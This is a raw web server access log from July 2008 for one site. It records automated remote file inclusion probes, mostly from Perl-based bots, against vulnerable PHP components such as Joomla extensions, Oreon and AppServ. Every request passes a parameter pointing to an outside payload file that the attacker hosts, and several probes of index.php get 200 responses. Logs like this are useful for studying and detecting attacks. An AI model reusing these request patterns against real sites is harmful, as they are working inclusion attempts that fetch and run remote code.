200.219.232.65 - - [06/Jul/2008:10:12:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:12:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:12:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:12:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:10:12:33 -0700] "GET /logs/access.log/index.php?lang=en&page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:12:34 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:12:34 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:12:34 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:12:56 -0700] "GET /index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18419 "-" "libwww-perl/5.65" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:18 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:13:25 -0700] "GET /logs/index.php?subpage=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:10:13:28 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:13:28 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:13:32 -0700] "GET /index.php?subpage=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:33 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:33 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:33 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:38 -0700] "GET /logs/access_080211.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:39 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:39 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:13:39 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:13:53 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:14:11 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:14:15 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:14:21 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:14:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:14:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:14:29 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:14:30 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:14:30 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:14:35 -0700] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:14:51 -0700] "GET /logs/index.php?fn=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:14:56 -0700] "GET /logs/index.php?fn=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.71.141 - - [06/Jul/2008:10:14:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:15:03 -0700] "GET /index.php?fn=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:10:15:04 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:10:15:05 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:15:06 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:15:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:15:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:15:10 -0700] "GET /index.php?fn=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:11 -0700] "GET /logs/access_080211.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:15:12 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:15:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:15:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:15:23 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:15:23 -0700] "GET /administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:28 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:28 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:28 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:15:30 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:15:30 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.71.141 - - [06/Jul/2008:10:15:31 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:50 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:15:51 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:15:52 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:15:52 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:15:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:10:15:56 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:16:02 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:16:03 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:16:15 -0700] "GET //index2.php?option=com_custompages&cpage=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:16:15 -0700] "GET /logs//index2.php?option=com_custompages&cpage=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:16:16 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:16:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:16:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:16:31 -0700] "GET /logs///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:16:31 -0700] "GET ///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:16:45 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:17:00 -0700] "GET /logs/index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:17:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:17:02 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:17:02 -0700] "GET /index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18419 "-" "libwww-perl/5.65" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:17:08 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:17:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:17:08 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:17:10 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:10:17:12 -0700] "GET /logs/access_080118.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:10:17:12 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [06/Jul/2008:10:17:20 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:17:22 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:17:52 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:17:53 -0700] "GET /logs/access_080212.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:18:00 -0700] "GET /logs/access_080105.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.184.74 - - [06/Jul/2008:10:18:01 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:18:04 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:18:12 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:18:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:18:13 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:18:15 -0700] "GET /logs/access_080315.log//component/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:18:24 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:18:24 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:18:24 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:18:44 -0700] "GET /logs/access.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:18:47 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:18:47 -0700] "GET /index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18491 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:18:47 -0700] "GET /logs/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:18:48 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:18:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:18:55 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:18:56 -0700] "GET /index.php?incl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18367 "-" "libwww-perl/5.69" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:19:05 -0700] "GET /logs/access.log/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:19:08 -0700] "GET /index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18483 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:19:08 -0700] "GET /logs/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:14 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:15 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:15 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:15 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:19:15 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:15 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [06/Jul/2008:10:19:15 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:19:16 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:19:16 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
